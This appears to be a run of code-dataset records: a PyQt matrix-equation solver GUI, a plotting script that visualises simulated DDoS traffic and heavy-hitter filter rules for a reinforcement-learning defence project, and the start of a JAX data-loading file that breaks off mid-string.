MainWindow.resize(848, 584)\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 243, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 243, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 243, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 243, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 243, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)\n MainWindow.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(\"Sitka Text\")\n font.setBold(True)\n font.setWeight(75)\n MainWindow.setFont(font)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.gridLayoutWidget = QtWidgets.QWidget(self.centralwidget)\n self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 0, MainWindow.width(), MainWindow.height()))\n self.gridLayoutWidget.setObjectName(\"gridLayoutWidget\")\n self.gridLayout = QtWidgets.QGridLayout(self.gridLayoutWidget)\n self.gridLayout.setContentsMargins(0, 0, 0, 0)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.title = QtWidgets.QLabel(self.gridLayoutWidget)\n font = QtGui.QFont()\n font.setFamily(\"Yu Gothic\")\n font.setPointSize(20)\n font.setBold(False)\n font.setWeight(50)\n self.title.setFont(font)\n self.title.setAlignment(QtCore.Qt.AlignCenter)\n self.title.setObjectName(\"title\")\n self.gridLayout.addWidget(self.title, 0, 0, 1, 1)\n self.toolsGrid = QtWidgets.QGridLayout()\n self.toolsGrid.setObjectName(\"toolsGrid\")\n self.method_combo = QtWidgets.QComboBox(self.gridLayoutWidget)\n self.method_combo.setModelColumn(0)\n self.method_combo.setObjectName(\"method_combo\")\n self.method_combo.addItem(\"\")\n self.method_combo.addItem(\"\")\n self.method_combo.addItem(\"\")\n self.method_combo.addItem(\"\")\n self.method_combo.addItem(\"\")\n self.method_combo.addItem(\"\")\n self.method_combo.currentIndexChanged.connect(self.on_method_changed)\n self.toolsGrid.addWidget(self.method_combo, 1, 1, 1, 1)\n self.iterations_number = QtWidgets.QSpinBox(self.gridLayoutWidget)\n self.iterations_number.setProperty(\"value\", 3)\n self.iterations_number.setObjectName(\"iterations_number\")\n self.toolsGrid.addWidget(self.iterations_number, 7, 1, 1, 1)\n self.methods_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.methods_label.setObjectName(\"methods_label\")\n self.toolsGrid.addWidget(self.methods_label, 1, 0, 1, 1)\n self.decomposition_method_combo = QtWidgets.QComboBox(self.gridLayoutWidget)\n self.decomposition_method_combo.setObjectName(\"decomposition_method_combo\")\n self.decomposition_method_combo.addItem(\"\")\n self.decomposition_method_combo.addItem(\"\")\n self.decomposition_method_combo.addItem(\"\")\n self.toolsGrid.addWidget(self.decomposition_method_combo, 5, 1, 1, 1)\n self.significant_figures_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.significant_figures_label.setObjectName(\"significant_figures_label\")\n self.toolsGrid.addWidget(self.significant_figures_label, 4, 0, 1, 1)\n self.paremters_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.paremters_label.setObjectName(\"paremters_label\")\n self.toolsGrid.addWidget(self.paremters_label, 5, 0, 1, 1)\n self.absolute_erroe_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.absolute_erroe_label.setObjectName(\"absolute_erroe_label\")\n self.toolsGrid.addWidget(self.absolute_erroe_label, 6, 0, 1, 1)\n self.significant_figures_spin = QtWidgets.QSpinBox(self.gridLayoutWidget)\n self.significant_figures_spin.setProperty(\"value\", 3)\n self.significant_figures_spin.setObjectName(\"significant_figures_spin\")\n self.toolsGrid.addWidget(self.significant_figures_spin, 4, 1, 1, 1)\n self.dimensionA_spin = QtWidgets.QSpinBox(self.gridLayoutWidget)\n self.dimensionA_spin.setProperty(\"value\", 3)\n self.dimensionA_spin.setObjectName(\"dimensionA_spin\")\n self.toolsGrid.addWidget(self.dimensionA_spin, 0, 1, 1, 1)\n self.matrixA_dimen = QtWidgets.QLabel(self.gridLayoutWidget)\n self.matrixA_dimen.setObjectName(\"matrixA_dimen\")\n self.toolsGrid.addWidget(self.matrixA_dimen, 0, 0, 1, 1)\n self.iterations_number_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.iterations_number_label.setObjectName(\"iterations_number_label\")\n self.toolsGrid.addWidget(self.iterations_number_label, 7, 0, 1, 1)\n self.absolute_relative_error_text = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.absolute_relative_error_text.setObjectName(\"absolute_relative_error_text\")\n self.toolsGrid.addWidget(self.absolute_relative_error_text, 6, 1, 1, 1)\n self.gridLayout.addLayout(self.toolsGrid, 2, 0, 1, 1)\n self.gridLayout_2 = QtWidgets.QGridLayout()\n self.gridLayout_2.setObjectName(\"gridLayout_2\")\n self.calculate_button = QtWidgets.QPushButton(self.gridLayoutWidget)\n font = QtGui.QFont()\n font.setFamily(\"Nirmala UI Semilight\")\n font.setPointSize(10)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(50)\n self.calculate_button.setFont(font)\n self.calculate_button.setObjectName(\"calculate_button\")\n self.gridLayout_2.addWidget(self.calculate_button, 0, 1, 1, 1)\n spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.gridLayout_2.addItem(spacerItem, 0, 2, 1, 1)\n spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.gridLayout_2.addItem(spacerItem1, 0, 0, 1, 1)\n self.gridLayout.addLayout(self.gridLayout_2, 3, 0, 1, 1)\n self.MatricesGrid = QtWidgets.QHBoxLayout()\n self.MatricesGrid.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint)\n self.MatricesGrid.setObjectName(\"MatricesGrid\")\n self.matrixA_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.matrixA_label.setObjectName(\"matrixA_label\")\n self.MatricesGrid.addWidget(self.matrixA_label)\n self.MatrixAGrid = QtWidgets.QGridLayout()\n self.MatrixAGrid.setObjectName(\"MatrixAGrid\")\n self.A00 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A00.setObjectName(\"A00\")\n self.MatrixAGrid.addWidget(self.A00, 0, 0, 1, 1)\n self.A01 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A01.setObjectName(\"A01\")\n self.MatrixAGrid.addWidget(self.A01, 0, 1, 1, 1)\n self.A02 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A02.setObjectName(\"A02\")\n self.MatrixAGrid.addWidget(self.A02, 0, 2, 1, 1)\n\n self.A11 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A11.setObjectName(\"A11\")\n self.MatrixAGrid.addWidget(self.A11, 1, 1, 1, 1)\n self.A20 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A20.setObjectName(\"A20\")\n self.MatrixAGrid.addWidget(self.A20, 2, 0, 1, 1)\n\n self.A12 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A12.setObjectName(\"A12\")\n self.MatrixAGrid.addWidget(self.A12, 1, 2, 1, 1)\n self.A21 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A21.setObjectName(\"A21\")\n self.MatrixAGrid.addWidget(self.A21, 2, 1, 1, 1)\n self.A10 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A10.setObjectName(\"A10\")\n self.MatrixAGrid.addWidget(self.A10, 1, 0, 1, 1)\n self.A22 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.A22.setObjectName(\"A22\")\n self.MatrixAGrid.addWidget(self.A22, 2, 2, 1, 1)\n self.MatricesGrid.addLayout(self.MatrixAGrid)\n self.matrixB_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.matrixB_label.setObjectName(\"matrixB_label\")\n self.MatricesGrid.addWidget(self.matrixB_label)\n self.MatrixB_grid = QtWidgets.QVBoxLayout()\n self.MatrixB_grid.setObjectName(\"MatrixB_grid\")\n self.B0 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.B0.setObjectName(\"B0\")\n self.MatrixB_grid.addWidget(self.B0)\n self.B1 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.B1.setObjectName(\"B1\")\n self.MatrixB_grid.addWidget(self.B1)\n self.B2 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.B2.setObjectName(\"B2\")\n self.MatrixB_grid.addWidget(self.B2)\n self.MatricesGrid.addLayout(self.MatrixB_grid)\n self.matrixX_label = QtWidgets.QLabel(self.gridLayoutWidget)\n self.matrixX_label.setObjectName(\"matrixX_label\")\n self.MatricesGrid.addWidget(self.matrixX_label)\n self.MatrixX_grid = QtWidgets.QVBoxLayout()\n self.MatrixX_grid.setObjectName(\"MatrixX_grid\")\n self.X0 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.X0.setObjectName(\"X0\")\n self.MatrixX_grid.addWidget(self.X0)\n self.X1 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.X1.setObjectName(\"X1\")\n self.MatrixX_grid.addWidget(self.X1)\n self.X2 = QtWidgets.QLineEdit(self.gridLayoutWidget)\n self.X2.setObjectName(\"X2\")\n self.MatrixX_grid.addWidget(self.X2)\n self.MatricesGrid.addLayout(self.MatrixX_grid)\n self.gridLayout.addLayout(self.MatricesGrid, 1, 0, 1, 1)\n MainWindow.setCentralWidget(self.centralwidget)\n size = QtWidgets.QDesktopWidget().screenGeometry(-1)\n self.gridLayoutWidget.setGeometry(QtCore.QRect(10, 20, size.width() - 20, size.height() - 100))\n MainWindow.setWindowFlags(QtCore.Qt.WindowCloseButtonHint | QtCore.Qt.WindowMinimizeButtonHint)\n MainWindow.showMaximized()\n self.reset()\n\n # MainWindow.setFixedSize(self.gridLayoutWidget.sizeHint())\n self.dimensionA_spin.valueChanged.connect(self.dimension_changed)\n self.newDimension = 3\n self.prevDimension = 3\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def reset(self):\n global readX\n readX = False\n self.decomposition_method_combo.setVisible(False)\n self.paremters_label.setVisible(False)\n self.absolute_erroe_label.setVisible(False)\n self.absolute_relative_error_text.setVisible(False)\n self.iterations_number.setVisible(False)\n self.iterations_number_label.setVisible(False)\n\n def on_method_changed(self, index):\n # number of method to be executed\n global method\n method = index\n print(method)\n if index == 3:\n self.reset()\n self.decomposition_method_combo.setVisible(True)\n self.paremters_label.setVisible(True)\n elif index == 4 or index == 5:\n self.reset()\n self.absolute_erroe_label.setVisible(True)\n self.absolute_relative_error_text.setVisible(True)\n self.iterations_number.setVisible(True)\n self.iterations_number_label.setVisible(True)\n else:\n self.reset()\n\n def dimension_changed(self):\n global dimension\n self.newDimension = self.dimensionA_spin.value()\n if self.newDimension > dimension:\n for i in range(0, self.newDimension):\n temp = QtWidgets.QLineEdit(self.gridLayoutWidget)\n temp.setObjectName(\"A\" + str(i) + str(self.newDimension - 1))\n self.MatrixAGrid.addWidget(temp, i, self.newDimension - 1, 1, 1)\n\n for i in range(0, self.newDimension - 1):\n temp = QtWidgets.QLineEdit(self.gridLayoutWidget)\n temp.setObjectName(\"A\" + str(self.newDimension - 1) + str(i))\n self.MatrixAGrid.addWidget(temp, self.newDimension - 1, i, 1, 1)\n temp = QtWidgets.QLineEdit(self.gridLayoutWidget)\n temp.setObjectName(\"B\" + str(self.newDimension - 1))\n self.MatrixB_grid.addWidget(temp)\n temp = QtWidgets.QLineEdit(self.gridLayoutWidget)\n temp.setObjectName(\"X\" + str(self.newDimension - 1))\n self.MatrixX_grid.addWidget(temp)\n else:\n for i in range(0, self.newDimension + 1):\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"A\" + str(i) + str(self.newDimension))\n temp.setParent(None)\n del temp\n\n for i in range(0, self.newDimension):\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"A\" + str(self.newDimension) + str(i))\n temp.setParent(None)\n del temp\n\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"B\" + str(self.newDimension))\n temp.setParent(None)\n del temp\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"X\" + str(self.newDimension))\n temp.setParent(None)\n del temp\n gc.collect()\n dimension = self.newDimension\n\n def readMatrices(self):\n global dimension\n global method\n self.matrixA = [[0 for x in range(dimension)] for y in range(dimension)]\n self.matrixB = [0 for x in range(dimension)]\n for i in range(0, dimension):\n for j in range(0, dimension):\n # print(\"A\" + str(i) + str(j))\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"A\" + str(i) + str(j)).text()\n if temp == '':\n self.matrixA[i][j] = 0\n else:\n self.matrixA[i][j] = float(temp)\n for i in range(0, dimension):\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"B\" + str(i)).text()\n if temp == '':\n self.matrixB[i] = 0\n else:\n self.matrixB[i] = float(temp)\n if method == 5 or method == 4:\n self.matrixX = [0 for x in range(dimension)]\n for i in range(0, dimension):\n temp = self.gridLayoutWidget.findChild(QtWidgets.QLineEdit, \"X\" + str(i)).text()\n if temp == '':\n self.matrixX[i] = 0\n else:\n self.matrixX[i] = float(temp)\n # print(self.matrixX)\n\n self.executeMethod()\n\n def executeMethod(self):\n global answer\n global dimension\n numberOfIterations = self.iterations_number.value()\n absolute_error = self.absolute_relative_error_text.text()\n number_of_significant_figures = self.significant_figures_spin.value()\n augumentedMatrixA = deepcopy(self.matrixA)\n method = self.method_combo.currentIndex()\n for i in range(0, dimension):\n augumentedMatrixA[i].append(self.matrixB[i])\n if method == 0:\n answer = gauss(augumentedMatrixA, dimension)\n elif method == 1:\n answer = jordanelimination(augumentedMatrixA, dimension)\n elif method == 2:\n gausswithpivoting(augumentedMatrixA, dimension)\n elif method == 3:\n answer = decomposition_method = self.decomposition_method_combo.currentIndex()\n if decomposition_method == 0:\n answer = downLittleDecomposition(self.matrixA, self.matrixB, dimension, number_of_significant_figures)\n elif decomposition_method == 1:\n answer = crout(self.matrixA, self.matrixB, dimension, number_of_significant_figures, )\n elif decomposition_method == 2:\n answer = cheloskeyDecomposition(self.matrixA, self.matrixB, dimension, number_of_significant_figures)\n elif method == 4:\n if absolute_error == '':\n answer = gauss_seidel(dimension, numberOfIterations, self.matrixA, self.matrixB, self.matrixX,\n number_of_significant_figures)\n else:\n answer = gauss_seidel_absolute_error(dimension, float(absolute_error), self.matrixA, self.matrixB,\n self.matrixX,\n number_of_significant_figures)\n elif method == 5:\n if absolute_error == '':\n answer = jacobi(dimension, numberOfIterations, self.matrixA, self.matrixB, self.matrixX,\n number_of_significant_figures)\n else:\n answer = jacobi_absolute_error(dimension, float(absolute_error), self.matrixA, self.matrixB,\n self.matrixX,\n number_of_significant_figures)\n\n def show_answer(self, ui, window):\n global answer\n self.readMatrices()\n ui.label.setText(answer)\n window.show()\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.title.setText(_translate(\"MainWindow\", \"Solving System of Linear Equations\"))\n self.method_combo.setCurrentText(_translate(\"MainWindow\", \"Gauss Elimination\"))\n self.method_combo.setItemText(0, _translate(\"MainWindow\", \"Gauss Elimination\"))\n self.method_combo.setItemText(1, _translate(\"MainWindow\", \"Gaus Jordan Elimination using pivoting\"))\n self.method_combo.setItemText(2, _translate(\"MainWindow\", \"Gauss Jordan\"))\n self.method_combo.setItemText(3, _translate(\"MainWindow\", \"LU Decompostion\"))\n self.method_combo.setItemText(4, _translate(\"MainWindow\", \"Gauss Siedel\"))\n self.method_combo.setItemText(5, _translate(\"MainWindow\", \"Jacobi Iteration\"))\n self.methods_label.setText(_translate(\"MainWindow\", \"Method :\"))\n self.decomposition_method_combo.setItemText(0, _translate(\"MainWindow\", \"Downlittle Form\"))\n self.decomposition_method_combo.setItemText(1, _translate(\"MainWindow\", \"Crout Form\"))\n self.decomposition_method_combo.setItemText(2, _translate(\"MainWindow\", \"Cholesky Form\"))\n self.significant_figures_label.setText(_translate(\"MainWindow\", \"Number of Significant Figures :\"))\n self.paremters_label.setText(_translate(\"MainWindow\", \"Method of decomposition :\"))\n self.absolute_erroe_label.setText(_translate(\"MainWindow\",\n \"Absolute Relative Error : \\n(number of iterations may differ than desired number to achieve error)\"))\n self.matrixA_dimen.setText(_translate(\"MainWindow\", \"Number of variables ( Dimension of A )\"))\n self.iterations_number_label.setText(_translate(\"MainWindow\", \"Number of iterations :\"))\n self.calculate_button.setText(_translate(\"MainWindow\", \"Calculate\"))\n self.matrixA_label.setText(_translate(\"MainWindow\", \"Coefficient Matrix A :\"))\n self.matrixB_label.setText(_translate(\"MainWindow\", \"Constant Matrix B :\"))\n self.matrixX_label.setText(_translate(\"MainWindow\", \"Initial Guess X :\"))\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n answerWindow = QtWidgets.QMainWindow()\n answer_ui = answer_window()\n answer_ui.setupUi(answerWindow)\n ui.calculate_button.clicked.connect(lambda: ui.show_answer(answer_ui, answerWindow))\n\n sys.exit(app.exec_())\n","repo_name":"sarahelshabrawy/Matrix-Calculator","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":20656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32253025347","text":"import json\nimport time\nfrom ipaddress import IPv4Address\n\nimport gzip\nimport numpy as np\nfrom gyms.hhh.cpp.hhhmodule import SketchHHH as HHHAlgo\nfrom matplotlib import pyplot as plt\nimport matplotlib.gridspec as mgrid\n\nfrom gyms.hhh.flowgen.distgen import TraceSampler\nfrom gyms.hhh.flowgen.traffic_traces import S1, S2, S3\nfrom gyms.hhh.label import Label\nfrom plotting.plot_results import add_vspan_to, get_vspan_spec_for\n\n# This script is used to visualize scenarios by generating an example episode and showing the active benign and attack\n# flows over time. Also the data rate is plotted. (Figures 6.2, 6.19, 6.26)\n# Scenarios can be selected by changing the line of code below, then simply run the script.\nscenario = S2() # change this line of code to \"S1()\", \"S2()\", or \"S3()\" to visualize a scenario\n\n\nclass ProgressBar(object):\n\n def __init__(self, maxprogress, step=100, displaysteps=10):\n self.maxprogress = maxprogress\n self.step = step\n self.displaysteps = displaysteps\n self.i = 0\n\n def increment(self):\n self.i += 1\n\n return self.i % (self.maxprogress / self.step) == 0\n\n def update(self):\n p = self.i / self.maxprogress\n e = '\\n' if self.i + 1 == self.maxprogress else ''\n fmt = '\\r [ {:' + str(self.displaysteps) + 's} ] {:3d}%'\n print(fmt.format('#' * round(self.displaysteps * p), round(100 * p)), end=e)\n\n\nclass HHHEntry(object):\n\n @staticmethod\n def copy(other):\n return HHHEntry(other.id, other.len, other.lo, other.hi)\n\n @staticmethod\n def from_dict(d):\n return HHHEntry(d['id'], d['len'], d['lo'], d['hi'])\n\n def __init__(self, id, len, lo, hi):\n self.id = id\n self.len = len\n self.size = Label.subnet_size(self.len)\n self.end = self.id + self.size\n self.lo = lo\n self.hi = hi\n\n def contains(self, other):\n return (self.len < other.len\n and other.id & Label.PREFIXMASK[self.len] == self.id)\n\n def __str__(self):\n return 'HHH(id: {}, len: {}, end: {}, lo: {}, hi: {})'.format(\n self.id, self.len, self.end, self.lo, self.hi)\n\n\ndef reduce_hhhs(hhhs):\n # Subtract lower level frequencies from higher level HHHs\n # to avoid overcounting\n for i in range(len(hhhs)):\n x = hhhs[i]\n for y in hhhs[i + 1:]:\n if y.contains(x):\n y.hi = max(0, y.hi - x.hi)\n y.lo = max(0, y.lo - x.lo)\n return hhhs\n\n\ndef render_hhhs(hhhs, grid, index):\n # Render HHHs onto to a numpy grid with equally\n # distributed item frequencies\n for hhh in hhhs:\n if hhh.hi > 0:\n grid[index, hhh.id: hhh.end] += hhh.hi / hhh.size\n\n\ndef playthrough(trace_sampler, epsilon, phi, minprefix, interval):\n bar = ProgressBar(trace_sampler.maxtime)\n frequencies = np.zeros_like(trace_sampler.rate_grid, dtype=np.float64)\n h = HHHAlgo(epsilon)\n hhhs = []\n time_index = 0\n\n # play through non-zero entries in rate_grid\n for packet, time_index_finished in trace_sampler.samples():\n # update hhh algorithm\n h.update(packet.ip)\n if not time_index_finished:\n continue\n # perform query and calculate hhh coverage\n if time_index % interval == interval - 1 and time_index != trace_sampler.maxtime:\n # HHHs are sorted in descending order of prefix length\n hhhs = [HHHEntry.copy(_) for _ in h.query(phi, minprefix)]\n hhhs = reduce_hhhs(hhhs)\n # Reset the HHH algorithm after querying\n h.clear()\n print(f'===== time index {time_index} =====')\n print(f'number of rules={len(hhhs)}')\n for r in hhhs:\n print(f'{str(IPv4Address(r.id)).rjust(15)}/{r.len} {r.lo, r.hi}')\n render_hhhs(hhhs, frequencies, time_index)\n time_index += 1\n\n if bar.increment():\n bar.update()\n\n return frequencies\n\n\ndef plot(steps, phi, l, flows, rate_grid, attack_grid, hhh_grid=None, squash=False, pattern_id=None):\n fig = plt.figure(figsize=(16, 9))\n gs = mgrid.GridSpec(3, 1)\n\n ax0 = fig.add_subplot(gs[0, :])\n ax1 = fig.add_subplot(gs[1, :])\n ax2 = fig.add_subplot(gs[2, :])\n\n titlesize = 15\n labelsize = 15\n benign_color = 'dodgerblue'\n attack_color = 'crimson'\n benign_grid = rate_grid - attack_grid\n\n def scale(grid, num_bins, axis, transpose=False):\n bins2 = np.linspace(0, grid.shape[axis], num_bins + 1).astype(int)[1:]\n split = np.split(grid, bins2[:-1], axis=axis)\n scaled2 = np.array([_.sum(axis=axis) for _ in split])\n if transpose: scaled2 = scaled2.T\n return scaled2, bins2\n\n def plot_heatmap(axis, grid, vmin=None, vmax=None, colorbar=False, colorbar_label=None):\n scaled_grid, ybins = scale(grid, steps + 1, 0)\n scaled_grid, _ = scale(scaled_grid, 200, 1)\n if squash:\n # squash values together for clearer visuals (e.g. for reflector-botnet switch)\n scaled_grid = np.sqrt(scaled_grid, out=np.zeros_like(scaled_grid, dtype=np.float))\n vmin = vmin if vmin is not None else scaled_grid.min()\n vmax = vmax if vmax is not None else scaled_grid.max()\n mesh = axis.pcolormesh(ybins, np.arange(200) / 2, scaled_grid, cmap='gist_heat_r', shading='nearest', vmin=vmin,\n vmax=vmax)\n\n axis.set_yticks(np.arange(0, 101, 50))\n axis.set_yticklabels(['0', '$2^{15}$', '$2^{16}$'])\n axis.set_xticks(np.arange(0, ybins.max() + 1, 100))\n axis.tick_params(labelsize=labelsize)\n if colorbar:\n cb = fig.colorbar(mesh, ax=axis, use_gridspec=True, pad=0.01)\n cb.set_label('Data rate' if colorbar_label is None else colorbar_label, fontsize=labelsize)\n cb.ax.tick_params(labelsize=labelsize)\n\n return vmin, vmax\n\n scaled_grid, ybins = scale(rate_grid, steps + 1, 0)\n scaled_grid, _ = scale(scaled_grid, 200, 1, True)\n if squash:\n # squash values together for clearer visuals (e.g. for reflector-botnet switch)\n scaled_grid = np.sqrt(scaled_grid, out=np.zeros_like(scaled_grid, dtype=np.float))\n vmin = scaled_grid.min()\n vmax = scaled_grid.max()\n\n if hhh_grid is not None:\n ax2.set_title('Applied filter rules', fontsize=titlesize)\n ax2.set_ylabel('Address space', fontsize=labelsize)\n ax2.set_xlabel('Time index', fontsize=labelsize)\n plot_heatmap(ax2, hhh_grid, colorbar=True, colorbar_label='HHH frequency')\n else:\n ax2.set_title('Combined data rate', fontsize=titlesize)\n ax2.set_ylabel('Address space', fontsize=labelsize)\n ax2.set_xlabel('Time index', fontsize=labelsize)\n vmin, vmax = plot_heatmap(ax2, rate_grid, colorbar=True)\n\n ax1.set_title('Attack data rate', fontsize=titlesize)\n ax1.set_ylabel('Address space', fontsize=labelsize)\n ax1.set_xlabel('Time index', fontsize=labelsize)\n plot_heatmap(ax1, attack_grid, vmin, vmax, colorbar=True)\n\n ax0.set_title('Benign data rate', fontsize=titlesize)\n ax0.set_ylabel('Address space', fontsize=labelsize)\n ax0.set_xlabel('Time index', fontsize=labelsize)\n plot_heatmap(ax0, benign_grid, vmin, vmax, colorbar=True)\n\n if pattern_id is not None:\n add_vspan_to(ax0, get_vspan_spec_for(pattern=pattern_id), True, use_time_index=True)\n add_vspan_to(ax1, get_vspan_spec_for(pattern=pattern_id), False, use_time_index=True)\n add_vspan_to(ax2, get_vspan_spec_for(pattern=pattern_id), False, use_time_index=True)\n for ax in [ax0, ax1, ax2]:\n ax.set_xlim(left=0)\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure()\n gs = mgrid.GridSpec(1, 1)\n\n ax0 = fig.add_subplot(gs[0, :])\n\n ax0.set_xlabel('Time index', fontsize=labelsize)\n ax0.set_ylabel('Data rate', fontsize=labelsize)\n x = range(benign_grid.shape[0])\n benign_y = benign_grid.sum(axis=1)\n attack_y = benign_y + attack_grid.sum(axis=1)\n ax0.fill_between(x, 0, benign_y, facecolor=benign_color, label='Benign traffic')\n ax0.fill_between(x, benign_y, attack_y, facecolor=attack_color, label='Attack traffic')\n ax0.tick_params(labelsize=labelsize)\n ax0.set_ylim(bottom=0)\n ax0.set_xlim(left=0, right=x[-1] + 1)\n if pattern_id is not None:\n add_vspan_to(ax0, get_vspan_spec_for(pattern=pattern_id), True, use_time_index=True)\n\n plt.legend(loc='upper left')\n plt.subplots_adjust(wspace=.5, hspace=.5)\n plt.tight_layout()\n plt.show()\n\n\ndef load_numpy(filename):\n with gzip.GzipFile(filename, 'r') as f:\n return np.load(f)\n\n\ndef load_tracesampler(flow_file, rate_grid_file, attack_grid_file):\n return TraceSampler.load(load_numpy(flow_file), load_numpy(rate_grid_file),\n load_numpy(attack_grid_file))\n\n\ndef render_blacklist_history(blacklist_file, maxtime, maxaddr):\n with open(blacklist_file, 'r') as f:\n episode_blacklist = json.load(f)\n hhhgrid = np.zeros((maxtime, maxaddr + 1))\n for time_index in range(len(episode_blacklist)):\n hhhs = [HHHEntry.from_dict(_) for _ in sorted(episode_blacklist[time_index],\n key=lambda x: x['len'], reverse=True)]\n print(f'======== TIME IDX {time_index} ========')\n print(f'number of rules={len(hhhs)}')\n # if len(hhhs) == 1:\n for r in sorted(hhhs, key=lambda h: h.id):\n print(f'{str(IPv4Address(r.id)).rjust(15)}/{r.len} {r.lo, r.hi}')\n render_hhhs(hhhs, hhhgrid, time_index)\n return hhhgrid\n\n\ndef main():\n visualize(None, None, None, None, True, 10, .0001, 599)\n\n\ndef visualize(flow_file, rate_grid_file, attack_grid_file, blacklist_file, nohhh, interval, epsilon, steps, phi=None,\n l=None, trace_id=None):\n if flow_file is None:\n trace = scenario\n fgs = trace.get_flow_group_samplers()\n trace_sampler = TraceSampler(fgs, steps)\n trace_sampler.init_flows()\n else:\n trace_sampler = load_tracesampler(flow_file, rate_grid_file,\n attack_grid_file)\n if blacklist_file:\n hhh_grid = render_blacklist_history(blacklist_file,\n trace_sampler.rate_grid.shape[0], trace_sampler.maxaddr)\n elif not nohhh:\n print('Calculating HHHs...')\n hhh_grid = playthrough(trace_sampler, epsilon, phi, l, interval)\n else:\n hhh_grid = None\n plot(steps, phi, l, trace_sampler.flows, trace_sampler.rate_grid,\n trace_sampler.attack_grid, hhh_grid, squash=True,\n pattern_id=trace.get_rate_pattern_id(0) if trace_id is None else trace_id)\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n pass\n","repo_name":"malluce/rl-ddos","sub_path":"plotting/flowgen/scenario_vis.py","file_name":"scenario_vis.py","file_ext":"py","file_size_in_byte":10782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12269456591","text":"\"\"\"\nThis file contains methods used to load data and train example network models.\n\nWilkie Olin-Ammentorp, 2022\nUniversity of Califonia, San Diego\n\"\"\"\n\nimport haiku as hk\nimport jax\nimport jax.numpy as jnp\n\nimport optax\nimport tensorflow_datasets as tfds\n\nfrom FHRR.modules import *\nfrom FHRR.utils import *\nfrom tqdm import tqdm\nfrom functools import reduce\n\n#\n# Data functions\n#\n\ndef load_dataset(dataset_name: str,\n split: str,\n *,\n is_training: bool,\n batch_size: int,\n repeat: bool = True):\n \"\"\"Loads the dataset as a generator of batches.\"\"\"\n\n\n ds = tfds.load(dataset_name, data_dir=\"~/data\", split=split).cache()\n if repeat:\n ds = ds.repeat()\n if is_training:\n ds = ds.shuffle(10 * batch_size, seed=0)\n ds = ds.batch(batch_size)\n\n x_full, y_full = tfds.as_numpy(tfds.load(dataset_name, \n split=[split], \n data_dir=\"~/data\",\n shuffle_files=True,\n as_supervised=True,\n batch_size=-1,\n with_info=False))[0]\n\n return iter(tfds.as_numpy(ds)), x_full, y_full\n\ndef scale_mnist(images):\n \"\"\"Convert int8 based values to normalized 